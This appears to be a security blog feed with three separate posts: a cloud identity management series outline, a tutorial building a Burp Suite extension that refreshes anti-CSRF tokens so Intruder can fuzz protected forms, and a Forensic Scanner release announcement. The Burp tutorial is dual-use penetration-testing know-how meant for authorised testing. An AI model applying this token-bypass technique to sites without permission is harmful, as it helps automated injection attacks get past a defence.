    We need to rethink how we manage trust and identities in order to take advantage of elastic, on-demand, and widely available web services for heterogenous clients. Right now, behind the scenes, new approaches to identity and access management are being deployed – often seamlessly into cloud services we already use. They reduce the risk and complexity of mapping identity to public or semi-public infrastructure, while remaining flexible enough to take full advantage of multiple cloud service and deployment models.


    Our goal for this series is to illustrate current trends and technologies that support cloud identity, describe the features available today, and help you navigate through the existing choices. The series will cover:


    • The Problem Space: We will introduce the issues that are driving cloud identity – from fully outsourced, hybrid, and proxy cloud services and deployment models. We will discuss how the cloud model is different than traditional in-house IAM, and discuss issues raised by the loss of control and visibility into cloud provider environments. We will consider the goals of IAM services for the cloud – drilling into topics including identity propagation, federation, and roles and responsibilities (around authentication, authorization, provisioning, and auditing). We will wrap up with the security goals we must achieve, and how compliance and risk influence decisions.
    • The Cloud Providers: For each of the cloud service models (SaaS, PaaS, and IaaS) we will delve into the IAM services built into the infrastructure. We will profile IAM offerings from some of the leading independent cloud identity vendors for each of the service models – covering what they offer and how their features are leveraged or integrated. We will illustrate these capabilities with a simple chart that shows what each provides, highlighting the conceptual model each vendor embraces to supply identity services. We will talk about what you will be responsible for as a customer, in terms of integration and management. This will include some of the deficiencies of these services, as well as areas to consider augmenting.
    • Use Cases: We will discuss three of the principal use cases we see today, as organizations move existing applications to the cloud and develop new cloud services. We will cover extending existing IAM systems to cover external SaaS services, developing IAM for new applications deployed on IaaS/PaaS, and adopting Identity as a Service for fully external IAM.
    • Architecture and Design: We will start by describing key concepts, including consumer/service patterns, roles, assertions, tokens, identity providers, relying party applications, and trust. We will discuss the available technologies for the heavy lifting (such as SAML, XACML, and SCIM) and discuss the problems they are designed to solve. We will finish with an outline of the different architectural models that will frame how you implement cloud identity services, including the integration patterns and tools that support each model.
    • Implementation Roadmap: IAM projects are complex, encompass most IT infrastructure, and may take years to implement. Trying to do everything at once is a recipe for failure. This portion of our discussion will help ensure you don’t bite off more than you can chew. We will discuss how to select an architectural model that meets your requirements, based on the cloud service and deployment models you selected. Then we will create different implementation roadmaps depending on your project goals and critical business requirements.
    • Buyer’s Guide: We will close by examining key decision criteria to help select a platform. We will provide questions to determine which vendors offer solutions that support your architectural model, and criteria to measure the appropriateness of a vendor solution against your design goals. We will also help walk you through the evaluation process.

    As always, we encourage you to ask questions and chime in with comments and suggestions. The community helps make our research better, and we encourage your participation.


    Next: the problems addressed by cloud identity services.


    - Adrian Lane
    (1) Comments

    Adding Anti-CSRF Support to Burp Suite Intruder

    Adding Anti-CSRF Support to Burp Suite Intruder:
    In the web application penetration testing industry, Burp Suite is considered a must-have tool – it includes an intercepting proxy, both active and passive web vulnerability scanners, crawler, session ID analysis tools and various other useful features, all under a single application. One of Burp's best features is the Intruder, a tool which allows the tester to provide a list of values which should be sent to the application as parameter values. By providing values which trigger SQL errors or inject JavaScript into the resulting page, one can easily determine if and how the application is filtering the parameters, and whether it is vulnerable to a given issue.


    Burp's Intruder works perfectly when the application responds to those requests as if they came from the user. Consider, for example, the submission of the following HTML form:
    <form action="/CSRFGuardTestAppVulnerable/HelloWorld" 
      method="POST" name="first">
        <input type="text" value="SpiderLabs" name="name">
        <input type="submit" value="submit" name="submit">
    </form>
    
    However, modern application frameworks are adding support for Anti-CSRF (Cross-Site Request Forgery) techniques, which protect the application from forged requests such as those Burp uses. The most commonly implemented prevention measure is the Synchronizer Token Pattern, which adds a parameter with a random value to all forms generated by the application for a given user session, and validates this token when the form is submitted. For example:
    <form action="/CSRFGuardTestApp/HelloWorld"
      method="POST" name="first">
        <input type="text" value="SpiderLabs" name="name">
        <input type="submit" value="submit" name="submit">
        <input type="hidden" value="Z0XN-1FRF-975E-GB9F-GGQM-L2RC-04H1-GKHQ"
          name="OWASP_CSRFTOKEN">
    </form>
    
    Because the OWASP_CSRFTOKEN parameter will change between every submission, the Intruder will not work, as it expects the application to respond to its requests as if they came from the user. The solution is rather simple: instead of simply feeding a set of values to the parameters being tested, we need to have the Intruder populate the Anti-CSRF token parameter from the form page.
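    Conceptually, refreshing the token is just a scrape of the form page before each submission. A minimal standalone sketch of that piece (plain Java, not part of the Burp Extender API; the regex assumes the attribute order shown in the form above):

    import java.util.regex.Matcher;
    import java.util.regex.Pattern;
    
    public class TokenScraper {
        /* Matches value="..." name="OWASP_CSRFTOKEN"; real pages may order the
           attributes differently, so treat the pattern as illustrative. */
        private static final Pattern TOKEN = Pattern.compile(
                "value=\"([^\"]+)\"\\s+name=\"OWASP_CSRFTOKEN\"");
    
        /* Returns the current Anti-CSRF token from the fetched form page, or null. */
        public static String extractToken(String formPageHtml) {
            Matcher matcher = TOKEN.matcher(formPageHtml);
            return matcher.find() ? matcher.group(1) : null;
        }
    }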

    This changes the default behavior of the Intruder tool quite a bit. First, it must know which parameter represents the Anti-CSRF token in the request. While many frameworks will use parameter names that include the "csrf" string, this can be configured per application, and thus we cannot rely on automatic detection. Second, it means the Intruder must make twice the number of requests it would normally perform: one to fetch the form page, which contains the Anti-CSRF token embedded in it, and a second one to actually submit the form with the parameter values provided by the tester. We will address both issues by developing a Burp extension called CSRF Intruder.
    Burp offers an extensibility API, called Burp Extender, which allows us to hook into various points in the application, including the UI and the request interception engine. The first thing we need to do is create a Java class which will host our extension.
    package burp;
    
    import spiderlabs.burp.intruder.CSRFIntruder;
    
    public class BurpExtender {
        private IBurpExtenderCallbacks callbacks;
        private CSRFIntruder csrfIntruder;
    
        public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
            this.callbacks = callbacks;
            this.csrfIntruder = new CSRFIntruder(this.callbacks);
            this.callbacks.registerMenuItem("CSRF Intruder", this.csrfIntruder);
            this.callbacks.issueAlert(String.format("Starting up CSRF Intruder extension [%s]",
                    this.getClass().getCanonicalName()));
        }
        
        public void processHttpMessage(java.lang.String toolName, boolean messageIsRequest,
            IHttpRequestResponse messageInfo) {
            /* Intercept Intruder requests and check if they came from CSRF Intruder */
            if (toolName.equals("intruder") && messageIsRequest)
                this.callbacks.issueAlert("TODO: Intercept CSRF Intruder requests");
        }
    }
    
    The registerExtenderCallbacks() method acts as the extension constructor, and is the first method called by Burp when the extension is loaded. It provides us with an IBurpExtenderCallbacks instance, which we use to create a new context menu entry for our CSRF Intruder handler. We also implement a processHttpMessage() method, which we will use to intercept Intruder requests and modify the Anti-CSRF token values before they are sent to the remote application.
    How does Burp use this class? It must obey a series of restrictions before Burp can find and use it:
    • It must be in package burp;
    • It must be named BurpExtender;
    • It must implement at least one of the methods in interface IBurpExtender;
    • Burp must be executed with the JVM classpath pointing to our BurpExtender class:

      java -classpath burp.jar;BurpProxyExtender.jar burp.StartBurp
    If these criteria are met (note that ';' is the Windows classpath separator; use ':' on Linux or OS X), then when Burp starts up our CSRF Intruder extension message should show up in the Alerts tab.
    We can now right-click anywhere a "Send to [...]" menu entry is displayed and click on "CSRF Intruder".
    Clicking on the CSRF Intruder menu entry will trigger the handler in our CSRFIntruder class, shown below:
    package spiderlabs.burp.intruder;
    
    import javax.swing.JOptionPane;
    
    import spiderlabs.burp.intruder.gui.CSRFConfigurationDialog;
    import burp.IBurpExtenderCallbacks;
    import burp.IHttpRequestResponse;
    import burp.IMenuItemHandler;
    
    public class CSRFIntruder implements IMenuItemHandler {
        private IBurpExtenderCallbacks callbacks;
        
        public CSRFIntruder(IBurpExtenderCallbacks callbacks) {
            this.callbacks = callbacks;
        }
        
        @Override
        public void menuItemClicked(String caption, IHttpRequestResponse[] messageInfo) {
            try {
                IHttpRequestResponse message = messageInfo[0];
                
                String refererUrl = new String();
                for (String header: this.callbacks.getHeaders(message.getRequest())) {
                    System.out.println(header);
                    if (header.startsWith("Referer:"))
                        refererUrl = header.split(":\\s")[1];
                }
                
                String parameters[][] = this.callbacks.getParameters(message.getRequest());
                CSRFIntruderConfiguration configuration =
                        CSRFConfigurationDialog.getConfigurationFromDialog(refererUrl, parameters);
                this.callbacks.issueAlert(configuration.toString());
            } catch (Exception exception) {
                this.callbacks.issueAlert(String.format("Error while obtaining request URL: %s",
                        exception.toString()));
            }
        }
    }
    
    The menuItemClicked() handler does two things: first, it fetches the value of the Referer header (if present) from the request the user right-clicked on and uses it as the suggested source form URL, that is, the place where we can find the Anti-CSRF token values; next, it obtains a list of all parameters in that request. It then sends those to a CSRFConfigurationDialog, which displays the URL and parameters, and waits for the user to configure the Anti-CSRF parameters.
    When the user provides the URL and the token parameter to be used, we already have all the information necessary to start up Intruder and manipulate its requests. That will come in a second post.

    Forensic Scanner

    Forensic Scanner: I've posted regarding my thoughts on a Forensic Scanner before, and just today, I gave a short presentation at the #OSDFC conference on the subject.

    Rather than describing the scanner, this time around, I released it.  The archive contains the Perl source code, a 'compiled' executable that you can run on Windows without installing Perl, a directory of plugins, and a PDF document describing how to use the tool.  I've also started populating the wiki with information about the tool and how it's used.

    Some of the feedback I received on the presentation was pretty positive.  I did chat with Simson Garfinkel for a few minutes after the presentation, and he had a couple of interesting thoughts to share.  The second was on making the Forensic Scanner thread-safe, so it can be multi-threaded and use multiple cores.  That might make it onto the "To-Do" list, but it was Simson's first thought that I wanted to address: he suggested that at a conference where the theme seemed to revolve around analysis frameworks, I should point out the differences between the other frameworks and what I was presenting on, so I wanted to take a moment to do that.

    Brian presented on Autopsy 3.0, and along with another presentation in the morning, discussed some of the features of the framework.  There was the discussion of pipelines, and having modules to perform specific functions, etc.  It's an excellent framework that has the capability of performing functions such as parsing Registry hives (utilizing RegRipper), carving files from unallocated space, etc.  For more details, please see the web site.  

    I should note that there are other open source frameworks available, as well, such as DFF.

    The Forensic Scanner is...different.  Neither better, nor worse...because it addresses a different problem.  For example, you wouldn't use the Forensic Scanner to run a keyword search or carve unallocated space.  The scanner is intended for quickly automating repetitive tasks of data collection, with some ability to either point the analyst in a particular direction, or perform a modicum of analysis along with the data presentation (depending upon how much effort you want to put into writing the plugins).  So, rather than providing an open framework which an analyst can use to perform various analysis functions, the Scanner allows the analyst to perform discrete, repetitive tasks.

    The idea behind the scanner is this...there're things we do all the time when we first initiate our analysis.  One is to collect simple information from the system...it's a Windows system, so which version of Windows is it, what are its time zone settings, is it 32- or 64-bit, etc.  We collect this information because it can significantly impact our analysis.  However, keeping track of all of these things can be difficult.  For example, if you're looking at an image acquired from a Windows system and don't see Prefetch files, what's your first thought?  Do you check the version of Windows you're examining?  Do you check the Registry values that apply to and control the system's prefetching capabilities?  I've talked with examiners whose first thought is that the user must have deleted the Prefetch files...but how do you know?

    Rather than maintaining extensive checklists of all of these artifacts, why not simply write a plugin to collect the data you want to collect, and possibly add a modicum of analysis into that plugin?  One analyst writes the plugin, shares it, and anyone with that plugin will have access to the functionality without having to have had the same experiences as the analyst.  You share it with all of your analysts, and they all have the capability at their fingertips.  Most analysts recognize the value of the Prefetch files, but some may not work with Windows systems all of the time, and may not stay up on the "latest and greatest" in analysis techniques that can be applied to those files.  So, let's say that instead of dumping all of the module paths embedded in Prefetch files, you add some logic to search for .exe files, .dat files, and any file that includes "temp" in the path, and display that information?  Or, why not create whitelists of modules over time, and have the plugin show you all modules not in that whitelist?

    Something that I and others have found useful is that, instead of forcing the analyst to use "profiles", as with the current version of RegRipper, the Forensic Scanner runs plugins automatically based on OS type, class, and then organizes the plugin results by category.  What this means is that for the system class of plugins, all of the plugins that pertain to "Program Execution" will be grouped together; this holds true for other plugin categories, as well.  This way, you don't have to go searching around for the information in which you're interested.

    As I stated more than once in the presentation, the Scanner is not intended to replace analysis; rather, it's intended to get you to the point of performing analysis much sooner.  For example, I illustrated a plugin that parses a user's IE index.dat file.  Under normal circumstances when performing analysis, you'd have to determine which version of Windows you were examining, determine the path to the particular index.dat file that you're interested in, and then extract it and parse it.  The plugin is capable of doing all of that...in the test case, all of the plugins I ran against a mounted volume completed in under 2 seconds...that's scans of the system, as well as both of the selected user profiles.

    So...please feel free to try the Scanner.  If you have any questions, you know where to reach me.  Just know that this is a work-in-progress, with room for growth.

    Addendum
    Matt Presser identified an issue that the Scanner has with identifying user profiles that contain a dot.  I fixed the issue and will be releasing an update once I make a couple of minor updates to other parts of the code.